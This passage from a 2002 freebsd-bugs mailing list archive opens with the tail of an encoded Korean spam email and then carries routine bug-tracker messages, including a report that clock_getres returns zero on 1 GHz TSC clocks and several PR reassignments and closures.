ICAgICAgICAgICAgYm9yZGVyPTA+IMbyu/0mbmJzcDu/rMi4uvEguOnBpiA8QlI+PElNRyBo ZWlnaHQ9NyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8v aXllc2NhcmQuY29tL2ltZy9idV8wMS5naWYiIHdpZHRoPTQgDQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIGJvcmRlcj0wPiCx3cC2vK268b26PEJSPjxJTUcgaGVpZ2h0PTcg DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0cDovL2l5ZXNjYXJk LmNvbS9pbWcvYnVfMDEuZ2lmIiB3aWR0aD00IA0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICBib3JkZXI9MD4gNb7vILmrt+EgurjH6CA8YnI+PGJyPjxicj48L1NQQU4+PC9Q Pg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8RElWIGFsaWduPWxlZnQ+DQog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxUQUJMRSBjZWxsU3BhY2luZz0wIGNl bGxQYWRkaW5nPTAgYm9yZGVyPTA+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg IDxUQk9EWT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPFRSPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICA8VEQgd2lkdGg9MTQzPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICA8UCBhbGlnbj1sZWZ0PjxTUEFOIA0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICBzdHlsZT0iRk9OVC1TSVpFOiA5cHQiPjxGT05UIGNvbG9y PSNjZDQ0MzM+PEI+Jm5ic3A7u+e2+8DHIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICC81bDhxuyx4jwvQj48L0ZPTlQ+PC9TUEFOPjwvUD48L1REPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICA8VEQgd2lkdGg9MTQzPg0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICA8UCBhbGlnbj1sZWZ0PiAmbmJzcDs8L1A+PC9URD48L1RSPjwvVEJP RFk+PC9UQUJMRT48L0RJVj48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPiAgICAgICAgPC90 ZD4NCiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICAgICAgPHRkIHdpZHRoPSI5NzQiPjxwIGFs aWduPSJsZWZ0Ij48Zm9udCBzaXplPSIyIiBmYWNlPSKxvLiyIiBjb2xvcj0iIzY2NjY2NiI+ Jm5ic3A7sc3Hz8DHIA0KICAgICAgICAgICAguN7Az8HWvNK0wiDApbytx87AuyDF68fYILz2 wf3H0SCwzcDMuOcsILHXv9y/oSC+7rawx9EgwaS6uLW1ILCusO0gDQogICAgICAgICAgICDA 1sH2IL7KwL3AuyC54Mj8tM+02S48YnI+ICZuYnNwO8DMIEUtbWFpbMC6ILnfvcXA/L/rwMy4 5ywgv/jEoSC+ysC4vccgDQogICAgICAgICAgICCw5r/sIL7Gt6Egw6K/oSC43sDPwda80rim IMDUt8LHz7+pIMHWvcO46SC1ziC5+CC02b3DILjewM/AzCANCiAgICAgICAgICAgILChwfYg Jm5ic3A7vsq1tbfPIMfPsNq9wLTPtNkuPGJyPiAmbmJzcDsmbmJzcDs8YnI+ICZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzwvZm9udD48 Rk9OVCBmYWNlPSKxvLiyIiBjb2xvcj0iIzY2NjY2NiIgc2l6ZT0yPrq7ILjewM/AuiDBpLq4 xeu9xbrOILHHsO0gu+fH17+hIMDHsMUgwaa48b+hIA0KPC9GT05UPjxGT05UIGZhY2U9IrG8 uLIiIGNvbG9yPSJyZWQiIHNpemU9IjIiPluxpLDtXTwvRk9OVD48Rk9OVCBmYWNlPSKxvLiy IiBjb2xvcj0iIzY2NjY2NiIgc2l6ZT0yPrbzsO0gx6W9w7XIILGksO0guN7Az8DUtM+02S48 L0ZPTlQ+PGZvbnQgY29sb3I9IiM2NjY2NjYiPjxCUj4gJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9mb250Pjxh IGhyZWY9Imh0dHA6Ly9peWVzY2FyZC5jb20vcmVzZnVsLmh0bWwiPjxmb250IGNvbG9yPSIj NjY2NjY2Ij48aW1nIHNyYz0iaHR0cDovL2l5ZXNjYXJkLmNvbS9pbWcvYnV0dG9uXzMuZ2lm IiB3aWR0aD0iNzEiIGhlaWdodD0iMjUiIGJvcmRlcj0iMCI+PC9mb250PjwvYT48Zm9udCBj b2xvcj0iIzY2NjY2NiI+IA0KICAgICAgICAgICAgPC9mb250PjxGT05UIGNvbG9yPSIjNjY2 NjY2IiANCnNpemU9Mj659sawwLsgxay4r8fPvcO46SC89r3FsMW6zsOzuK6woSDAzLfnvu4g wf20z7TZLjwvRk9OVD48Zm9udCBjb2xvcj0iIzY2NjY2NiI+IDwvZm9udD48L3A+DQogICAg ICAgIDwvdGQ+DQogICAgPC90cj4NCiAgICA8dHI+DQogICAgICAgIDx0ZCB3aWR0aD0iOTc0 Ij4NCiAgICAgICAgICAgIDxwIGFsaWduPSJjZW50ZXIiPjxmb250IGNvbG9yPSIjNjY2NjY2 Ij4mbmJzcDs8L2ZvbnQ+PEZPTlQgZmFjZT0isby4siIgY29sb3I9IiM2NjY2NjYiIHNpemU9 Mj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtJZiB5b3Ugd29uJ3QgcmVjZWl2ZSBhbnkgbW9y ZSBtYWlsIGFib3V0IHRoaXMgDQpzaXRlLCA8L0ZPTlQ+PGZvbnQgY29sb3I9IiM2NjY2NjYi PjxCUj4gJm5ic3A7Jm5ic3A7PC9mb250PjxhIGhyZWY9Imh0dHA6Ly9peWVzY2FyZC5jb20v cmVzZnVsLmh0bWwiPjxmb250IGNvbG9yPSIjNjY2NjY2Ij48aW1nIHNyYz0iaHR0cDovL2l5 ZXNjYXJkLmNvbS9pbWcvYnV0dG9uXzQuZ2lmIiB3aWR0aD0iNzEiIGhlaWdodD0iMjUiIGJv cmRlcj0iMCI+PC9mb250PjwvYT48Rk9OVCBjb2xvcj0iIzY2NjY2NiIgDQpzaXplPTI+cHJl c3MgYnV0dG9uIGFuZCBmaWxsIHlvdXIgZS1tYWlsIGFkZHJlc3MuIEFuZCB0aGVuIHdlIHdp bGwgbm90IHNlbmQgYW55IA0KbWFpbCB0byB5b3U8L0ZPTlQ+PC9wPg0KICAgICAgICA8L3Rk Pg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgICAgICA8dGQgd2lkdGg9Ijk3NCIgYmdjb2xv cj0iIzhCQjVFMiI+DQogICAgICAgICAgICA8cD4mbmJzcDs8Zm9udCBzaXplPSIyIiBmYWNl PSKxvLiyIiBjb2xvcj0iIzMzMzMzMyI+ursguN7Az8C6IMf2tOvEq7XlvLOw6LvnwMcgDQog ICAgICAgICAgICCws8DOIL+1vvcguN7Az8DUtM+02S4gJm5ic3A7uN7Az7nfvNvA2iC/rLb0 w7MgOiA8L2ZvbnQ+PGEgaHJlZj0ibWFpbHRvOmVuZXh0b3BAbHljb3MuY28ua3IiPjxmb250 IHNpemU9IjIiIGZhY2U9IrG8uLIiIGNvbG9yPSIjMzMzMzMzIj5lbmV4dG9wQGx5Y29zLmNv LmtyPC9mb250PjwvYT48Zm9udCBzaXplPSIyIiBmYWNlPSKxvLiyIiBjb2xvcj0iIzMzMzMz MyI+IA0KICAgICAgICAgICAgJm5ic3A7PC9mb250PjwvcD4NCiAgICAgICAgPC90ZD4NCiAg ICA8L3RyPg0KPC90YWJsZT4NCjxwPiZuYnNwOzwvcD4NCjwvYm9keT4NCg0KPC9odG1sPg0K ------=_NextPart_000_0207_01C0F51A.93A06C00-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 8:30:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4D16C37B400 for ; Mon, 19 Aug 2002 08:30:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9BD9E43E4A for ; Mon, 19 Aug 2002 08:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JFU2JU068610 for ; Mon, 19 Aug 2002 08:30:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JFU2KO068609; Mon, 19 Aug 2002 08:30:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9EF9137B400 for ; Mon, 19 Aug 2002 08:29:20 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6140E43E6A for ; Mon, 19 Aug 2002 08:29:20 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JFTKOT066377 for ; Mon, 19 Aug 2002 08:29:20 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7JFTKSe066376; Mon, 19 Aug 2002 08:29:20 -0700 (PDT) Message-Id: <200208191529.g7JFTKSe066376@www.freebsd.org> Date: Mon, 19 Aug 2002 08:29:20 -0700 (PDT) From: Kevin Martin To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/41781: clock_getres returns tv_nsec=0 when TSC is 1Ghz or faster Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41781 >Category: kern >Synopsis: clock_getres returns tv_nsec=0 when TSC is 1Ghz or faster >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Aug 19 08:30:02 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Kevin Martin >Release: 4.6-STABLE >Organization: pair Networks, Inc >Environment: FreeBSD vondu.pair.com 4.6-STABLE FreeBSD 4.6-STABLE #12: Mon Aug 19 10:08:01 GMT 2002 sigma@vondu.pair.com:/usr/src/sys/compile/PAIRa i386 >Description: When the the TSC timer is 1Ghz or faster: Timecounter "TSC" frequency 1002275326 Hz kern/kern_time.c handles clock_getres by dividing this value into 1000000000L. The integer result is unfortunately zero. Programs which expect a useful result are disappointed. For example, PGP uses this value and divides by it, promptly dumping core. >How-To-Repeat: #include #include main() { struct timespec res; clock_getres(CLOCK_REALTIME, &res); printf("%u\n",(unsigned)res.tv_nsec); } gcc -o test test.c ./test >Fix: I believe the best solution is to return a minimum value of one nanosecond, since the worst you've done is tell the calling program that the timer is less precise than it is. Does POSIX have anything to say? I don't know. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 8:37: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 718F737B400; Mon, 19 Aug 2002 08:37:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 24BA143E42; Mon, 19 Aug 2002 08:37:08 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JFb7JU070613; Mon, 19 Aug 2002 08:37:08 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JFb7o7070605; Mon, 19 Aug 2002 08:37:07 -0700 (PDT) Date: Mon, 19 Aug 2002 08:37:07 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191537.g7JFb7o7070605@freefall.freebsd.org> To: howardjp@wam.umd.edu, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/11248: Shuffle Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Shuffle State-Changed-From-To: feedback->closed State-Changed-By: johan State-Changed-When: Mon Aug 19 08:35:43 PDT 2002 State-Changed-Why: Feedback timeout. http://www.freebsd.org/cgi/query-pr.cgi?pr=11248 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 8:41:59 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 468CF37B400; Mon, 19 Aug 2002 08:41:56 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E454943E70; Mon, 19 Aug 2002 08:41:55 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JFfsJU071288; Mon, 19 Aug 2002 08:41:55 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JFfrHk071284; Mon, 19 Aug 2002 08:41:53 -0700 (PDT) Date: Mon, 19 Aug 2002 08:41:53 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191541.g7JFfrHk071284@freefall.freebsd.org> To: lance@radiocentral.com, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, mjacob@FreeBSD.org Subject: Re: kern/26356: Large copy of files to the machine causes it to reboot w/ error "ahc0: ahc_intr - referenced scb not valid during SELTO scb(9, 255)" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Large copy of files to the machine causes it to reboot w/ error "ahc0: ahc_intr - referenced scb not valid during SELTO scb(9, 255)" State-Changed-From-To: feedback->closed State-Changed-By: johan State-Changed-When: Mon Aug 19 08:40:34 PDT 2002 State-Changed-Why: Feedback timeout. Responsible-Changed-From-To: freebsd-bugs->mjacob Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 08:40:34 PDT 2002 Responsible-Changed-Why: Over to mjacob who asked for feedback in case it arrives in the future. http://www.freebsd.org/cgi/query-pr.cgi?pr=26356 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 8:45:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 93D1B37B401; Mon, 19 Aug 2002 08:45:11 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id B452243E8A; Mon, 19 Aug 2002 08:45:10 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JFjAJU072715; Mon, 19 Aug 2002 08:45:10 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JFitpp072690; Mon, 19 Aug 2002 08:44:55 -0700 (PDT) Date: Mon, 19 Aug 2002 08:44:55 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191544.g7JFitpp072690@freefall.freebsd.org> To: lonnie@valemount.com, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-scsi@FreeBSD.org Subject: Re: i386/30527: does not like scsi on atrend 6260 dual PIII (adaptec 7880) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: does not like scsi on atrend 6260 dual PIII (adaptec 7880) State-Changed-From-To: feedback->closed State-Changed-By: johan State-Changed-When: Mon Aug 19 08:43:35 PDT 2002 State-Changed-Why: Feedback timeout. Responsible-Changed-From-To: freebsd-bugs->freebsd-scsi Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 08:43:35 PDT 2002 Responsible-Changed-Why: Over to -scsi, they might be interested in future feedback. http://www.freebsd.org/cgi/query-pr.cgi?pr=30527 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 9: 1:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2B76A37B422; Mon, 19 Aug 2002 09:01:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id C73A243E75; Mon, 19 Aug 2002 09:01:01 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JG11JU075196; Mon, 19 Aug 2002 09:01:01 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JG11fH075190; Mon, 19 Aug 2002 09:01:01 -0700 (PDT) Date: Mon, 19 Aug 2002 09:01:01 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191601.g7JG11fH075190@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-qa@FreeBSD.org Subject: Re: kern/4845: Boot complains about disk slices in FAT partitions - FDIV075 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Boot complains about disk slices in FAT partitions - FDIV075 Responsible-Changed-From-To: freebsd-bugs->freebsd-qa Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 09:00:10 PDT 2002 Responsible-Changed-Why: Bruce indicated that this is/was a sysinstall issue. http://www.freebsd.org/cgi/query-pr.cgi?pr=4845 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 9:10:11 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8CFB337B406 for ; Mon, 19 Aug 2002 09:10:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2CE3443E3B for ; Mon, 19 Aug 2002 09:10:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JGA4JU081351 for ; Mon, 19 Aug 2002 09:10:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JGA4UW081346; Mon, 19 Aug 2002 09:10:04 -0700 (PDT) Date: Mon, 19 Aug 2002 09:10:04 -0700 (PDT) Message-Id: <200208191610.g7JGA4UW081346@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Neil Darlow Subject: Re: bin/41777: /etc/periodic/daily/100.clean-disks removes lisp.core Reply-To: Neil Darlow Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/41777; it has been noted by GNATS. From: Neil Darlow To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: bin/41777: /etc/periodic/daily/100.clean-disks removes lisp.core Date: Mon, 19 Aug 2002 17:02:27 +0100 The cmucl port maintainer has agreed to address this problem. He will probably rename the offending file but there is a chance that this could affect another package at sometime in the future. Regards, Neil Darlow M.Sc. -- ICQ: 135505456 E-Mail, Jabber, MSNM: see following GPG identity 1024D/531F9048 1999-09-11 Neil Darlow Key fingerprint = 359D B8FF 6273 6C32 BEAA 43F9 E579 E24A 531F 9048 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 9:58:32 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 980DA37B400; Mon, 19 Aug 2002 09:58:30 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4850E43E70; Mon, 19 Aug 2002 09:58:30 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JGwUJU091485; Mon, 19 Aug 2002 09:58:30 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JGwUpa091481; Mon, 19 Aug 2002 09:58:30 -0700 (PDT) Date: Mon, 19 Aug 2002 09:58:30 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191658.g7JGwUpa091481@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, brian@FreeBSD.org Subject: Re: misc/17377: "Checking for rejected mail hosts:" gives too little info Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: "Checking for rejected mail hosts:" gives too little info Responsible-Changed-From-To: freebsd-bugs->brian Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 09:56:08 PDT 2002 Responsible-Changed-Why: Brian, as something of a periodic guru, what do you think of the proposed patch? http://www.freebsd.org/cgi/query-pr.cgi?pr=17377 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 10: 8: 1 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DFD8737B400; Mon, 19 Aug 2002 10:07:59 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E6A943E86; Mon, 19 Aug 2002 10:07:59 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JH7xJU097702; Mon, 19 Aug 2002 10:07:59 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JH7x5h097698; Mon, 19 Aug 2002 10:07:59 -0700 (PDT) Date: Mon, 19 Aug 2002 10:07:59 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191707.g7JH7x5h097698@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, luigi@FreeBSD.org Subject: Re: bin/18895: 'fe80::' cannot be used in "via" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: 'fe80::' cannot be used in "via" Responsible-Changed-From-To: freebsd-bugs->luigi Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 10:06:59 PDT 2002 Responsible-Changed-Why: luigi is our ipfw guru. http://www.freebsd.org/cgi/query-pr.cgi?pr=18895 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 10:50: 3 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AA1AD37B400; Mon, 19 Aug 2002 10:49:59 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5DE5343E65; Mon, 19 Aug 2002 10:49:59 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JHnxJU005895; Mon, 19 Aug 2002 10:49:59 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JHnxNl005891; Mon, 19 Aug 2002 10:49:59 -0700 (PDT) Date: Mon, 19 Aug 2002 10:49:59 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191749.g7JHnxNl005891@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, dougb@FreeBSD.org Subject: Re: conf/21066: Proposed change in rc scripts Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Proposed change in rc scripts Responsible-Changed-From-To: freebsd-bugs->dougb Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 10:47:59 PDT 2002 Responsible-Changed-Why: I belive Doug said he would look after rc*. http://www.freebsd.org/cgi/query-pr.cgi?pr=21066 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 10:52:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4BEA437B400; Mon, 19 Aug 2002 10:52:14 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id F035B43E6E; Mon, 19 Aug 2002 10:52:13 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JHqDJU006353; Mon, 19 Aug 2002 10:52:13 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JHqDah006349; Mon, 19 Aug 2002 10:52:13 -0700 (PDT) Date: Mon, 19 Aug 2002 10:52:13 -0700 (PDT) From: Johan Karlsson Message-Id: <200208191752.g7JHqDah006349@freefall.freebsd.org> To: johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, peter@FreeBSD.org Subject: Re: gnu/18857: Enable GSSAPI in CVS if available Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Enable GSSAPI in CVS if available Responsible-Changed-From-To: freebsd-bugs->peter Responsible-Changed-By: johan Responsible-Changed-When: Mon Aug 19 10:51:42 PDT 2002 Responsible-Changed-Why: Over to csv maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=18857 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 10:54:48 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2823537B401 for ; Mon, 19 Aug 2002 10:54:48 -0700 (PDT) Received: from constellation.wizardsworks.org (cm052.50.234.24.lvcm.com 